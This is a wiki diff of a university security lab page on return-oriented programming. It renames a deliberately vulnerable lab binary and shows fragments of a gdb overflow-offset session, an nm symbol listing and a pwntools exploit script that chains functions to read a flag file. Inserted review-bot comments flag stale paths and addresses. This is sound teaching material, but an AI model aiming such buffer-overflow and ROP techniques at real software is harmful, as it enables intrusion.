This shows you the differences between two versions of the page.
cns:labs:lab-09 [2020/12/14 16:43] mihai.dumitru2201 [1. Return to main] |
cns:labs:lab-09 [2022/12/05 13:36] (current) mihai.dumitru2201 [Tasks] |
|---|---|---|---|
| Line 1: | Line 1: | ||
| - | ====== Lab 09 - Return Oriented Programming (Part 2) ====== | + | ====== Lab 09 - Return-Oriented Programming (Part 2) ====== |
| ===== Introduction ===== | ===== Introduction ===== | ||
| Line 31: | Line 31: | ||
| All content necessary for the CNS laboratory tasks can be found in [[cns:resources:repo|the CNS public repository]]. | All content necessary for the CNS laboratory tasks can be found in [[cns:resources:repo|the CNS public repository]]. | ||
| + | |||
| ==== 1. Return to main ==== | ==== 1. Return to main ==== | ||
| - | Inspect the source file ''task1.c''. See if you can spot the vulnerability. | + | Inspect the source file ''ret_to_main.c''. See if you can spot the vulnerability. |
| The goal of the task is to get the contents of the ''flag'' file through the binary. In order to do this, we need to chain three functions together. | The goal of the task is to get the contents of the ''flag'' file through the binary. In order to do this, we need to chain three functions together. | ||
| Line 42: | Line 43: | ||
| <code asm> | <code asm> | ||
| - | # gdb ./task1 | + | # gdb ./ret_to_main |
| gdb-peda$ pattc 0x40 | gdb-peda$ pattc 0x40 | ||
| 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH' | 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH' | ||
| gdb-peda$ r | gdb-peda$ r | ||
| - | Starting program: /cns/lab-11/sol/task1 | + | Starting program: /cns/lab-11/sol/ret_to_main |
| Welcome to our Retired Old Programmers message board! | Welcome to our Retired Old Programmers message board! | ||
| Please leave a message: | Please leave a message: | ||
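Review bot: the `Starting program:` line still points at `/cns/lab-11/sol/ret_to_main` although this page is Lab 09, which shows the gdb transcript was edited by hand rather than re-captured after the rename; either re-run the session from the renamed binary's real location or correct the directory to match the lab number, otherwise readers who copy the path get a "No such file" error.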
| Line 110: | Line 111: | ||
| We'll need to save a few useful addresses: | We'll need to save a few useful addresses: | ||
| <code bash> | <code bash> | ||
| - | # nm task1 | egrep "main|stop|right|there|play" | + | # nm ret_to_main | egrep "main|stop|right|there|play" |
| | | ||
| 00000000004012b5 T main | 00000000004012b5 T main | ||
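Review bot: only the `nm` command line was updated while the symbol output (`00000000004012b5 T main` and the following lines) was left as-is, so the listed addresses are only valid if `ret_to_main` was built from the same source with the same compiler flags as the old `task1`; re-run `nm` on the renamed binary and refresh the listing, since the Python script further down hardcodes these values. Also, `egrep` is deprecated in GNU grep and prints a warning on recent systems; `grep -E "main|stop|right|there|play"` is the portable form.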
| Line 126: | Line 127: | ||
| from pwn import * | from pwn import * | ||
| - | io = process('./task1') | + | io = process('./ret_to_main') |
| # Useful values | # Useful values | ||
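Review bot: `process('./ret_to_main')` uses a path relative to the current working directory, so the script only works when launched from the directory holding the binary; the `# Useful values` section that follows presumably carries the addresses from the `nm` listing above, which this change did not regenerate, so verify them against the renamed binary before relying on the script. Loading the binary with pwntools' `ELF('./ret_to_main')` and reading its `symbols` dictionary would keep those values in sync automatically.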
| Line 156: | Line 157: | ||
| <code bash> | <code bash> | ||
| # ./test.py | # ./test.py | ||
| - | [+] Starting local process './task1': Done | + | [+] Starting local process './ret_to_main': Done |
| [*] Switching to interactive mode | [*] Switching to interactive mode | ||
| -> secret vault opened | -> secret vault opened | ||
| Line 162: | Line 163: | ||
| Please leave a message: | Please leave a message: | ||
| $ | $ | ||
| - | [*] Stopped program './task1' | + | [*] Stopped program './ret_to_main' |
| </code> | </code> | ||